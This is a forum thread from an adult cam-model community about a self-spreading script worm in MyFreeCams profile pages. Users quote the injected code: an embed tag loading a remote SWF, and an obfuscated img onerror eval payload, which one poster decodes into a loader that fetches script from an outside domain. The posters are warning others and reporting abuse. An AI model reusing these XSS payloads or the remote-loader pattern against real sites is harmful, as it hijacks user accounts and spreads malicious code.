AmberCutie's Forum
An adult community for cam models and members to discuss all the things!

Profile Pop-Ups??

  • ** WARNING - ACF CONTAINS ADULT CONTENT **
    Only persons aged 18 or over may read or post to the forums, without regard to whether an adult actually owns the registration or parental/guardian permission. AmberCutie's Forum (ACF) is for use by adults only and contains adult content. By continuing to use this site you are confirming that you are at least 18 years of age.
Status
Not open for further replies.
This is a <script> within the model's profile, since MFC uses HTML for it's profiles. So, a model can insert any code they wish. This is NOT a MFC popup. Some models use the coding and scripts to have affiliate popups now.

If you are a model, PLEASE do not put popup scripts in your code on your profile. It only eats up MFC server bandwidth (slows the system down more. lol) and is ANNOYING!!

Thanks!
 
Exactly...

However, I have a copy of a Model's Contract and I checked the contract and it does not state anywhere in the contract that a model can't use script codes. I think a revision of the model's contract will be coming soon. lol.

I will check into this more by reviewing the MFC source code to verify if it is from the model or MFC producing these popups. I will post my findings soon (MFC uses a LOT of source code. lol)
 
That means MFC has lowered their standards and did just what they accused other cam sites of doing!!
Placing advertisements on their website is not a good idea.

MFC promotes itself as "not the usual chat site", but apparently they ARE like all the others. I have a bad feeling this will cause issues (slower server and customers getting frustrated with popups).

lol.

Another way for MFC to get money from customer's by using tools that he said he would never use. lol. How does that quote go? - "Once a liar, always a liar". lol. :)

Hopefully, MFC is just testing this new idea and will not use popups. They are annoying ESPECIALLY WHEN IT BLOCKS THE PROFILE CONTENT IN THE BACKGROUND behind the popup. Geez!!

Other cam sites do not use popups for a reason!! Cam Girls Unlimited does not even use popups. lol.
 
I just figured out that somebody embedded this in my favorite books portion of my profile :

<embed id=nig src=http://lilweezyconcert.com./myfc.swf allowscriptaccess=always width=1 height=1>

I deleted it and seems fine now but WTF and how did it get in there!?!??
 
premiums said they got a notice from mfc saying the profiles were hijacked everyone needs to go to their profile and delete the script that has been embedded in the books section.
 
Ah.

So, MFC was hacked. Nice.
That means MFC uses BASIC HTML codes and even WEBCAM transmissions can be hijacked.
I foresee a LOT of problems with this latest exploitation.

Example...
A person can "hijack" the live feed and post the live feed on another website.
Or a model's account could be compromised.

Look at the BIGGER picture, people.
 
CamGirlsUnlimited said:
Ah.

So, MFC was hacked. Nice.
That means MFC uses BASIC HTML codes and even WEBCAM transmissions can be hijacked.
I foresee a LOT of problems with this latest exploitation.

Example...
A person can "hijack" the live feed and post the live feed on another website.
Or a model's account could be compromised.

Look at the BIGGER picture, people.
Click to expand...

We're not trying to get riled up here. :mrgreen:
:text-lol:
 
Yeah I'm sure they disabled them temporarily while they combat this.
 
I didn't get a notice from MFC, but it looks like profiles are down for disinfection now.
 
I wasn't trying to get people riled up. lol.

I was only stating that hacks, exspecially to ALL profiles by adding a script for popups (including MODEL'S PROFILES), shows that NO ACCOUNT is safe, not even model's accounts and that MFC uses simple and basic HTML coding and is open for more SEVERE attacks and "pranks".

Whomever did this may have done the popup as a "test" of MFC's defenses and could be planning more and bigger exploitation attacks.
 
It looks like it has been fixed. Let's hope MFC learns a lesson from this.
 
Supposedly.... Theres some type of weird link that has planted itself into the profile HTML. Something about WEEZY or similar. Models should check their profiles and remove any links that shouldnt be in the HTML.
 
AlexLady said:
Cam girls can -not- use Java or scripts. Just basic HTML.

I guess they fixed this while it was down though.
Click to expand...

I love AlexLady - You are so smart.
And I am being truthful about that!
 
MFC Profile Exploit

I logged in tonight and was browsing model profiles and on one profile I viewed I got a popup. Apparently there is an exploit on MFC that when you view a model profile it creates a popup window with affiliate links in order to make somebody money.

What is really bad is that when you visit the model's profile it also adds the same code into your profile under your Favorite Books section. So that when somebody visits your profile they get the popup with the affiliate offers and the code places itself into their profile as well.

I contacted MFC about this although I'm not sure how soon they will reply or whether or not they know what is going on.

The piece of code that was listed on my profile looks like the following..

Code: 
<img src=http://x lol/onerror=eval(String.fromCharCode(118,97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97
,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,
46,115,114,99,32,61,32,39,104,116,116,112,58,47,47,109,111,100,117,108,97,114,119,111
,114,107,115,116,97,116,105,111,110,115,46,99,111,46,99,99,47,109,121,102,99,46,106,115,
39,59,13,10,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,
104,105,108,100,40,115,41,59,13,10,32,32,32,32))>

If you know of any models or members currently experiencing these issues let them know!
 
Basically the code replicates itself into your profile when you visit that particular person's profile. It does this automatically as soon as the profile is done loading and the only way to prevent it is to stop the page from loading the script when you visit a profile.

Unfortunately due to the way this works it spreads around like wildfire and is very hard to stop without some major intervention by MFC themselves.
 
Re: MFC Profile Exploit

Just used an Ordinal to Char Converter from http://www.gooby.ca/decrypt/decoders/ord2char.php which shows that the script that would run was the following.

Code: 
var s = document.createElement('script');
s.src = 'http://modularworkstations.co.cc/myfc.js';
document.body.appendChild(s);

After some research it appears www.co.cc offers these domains. I reported his for abuse.
 
Status
Not open for further replies.

Similar threads

FriendsOnline
  • Locked
  • Poll
Friends Online is looking for 2-3 models/studios interested in free multi-streaming up to 4khd
Replies
54
Views
3K
General Cam/Creator Chat
AmberCutie
AmberCutie
Y
  • Locked
  • Question
I gave my Spotify profile to a camgirl, but I’m worried it wasn’t her that followed me…
Replies
9
Views
941
Chaturbate
Yessirrr
Y
Official_Lovense
  • Locked
  • Poll
Have you tried the Lovense Ferri yet?
Replies
9
Views
1K
General Cam/Creator Chat
Official_Lovense
Official_Lovense
P
  • Locked
Coming Soon! Claim your model profile!
Replies
9
Views
1K
General Cam/Creator Chat
JazzabelleRox
JazzabelleRox
NaomiNSFW
  • Locked
I made Chaturbate Spanks 👋🍑 & Tip Achievements Bots 🥇
Replies
1
Views
666
General Cam/Creator Chat
NaomiNSFW
NaomiNSFW
Top Bottom
Back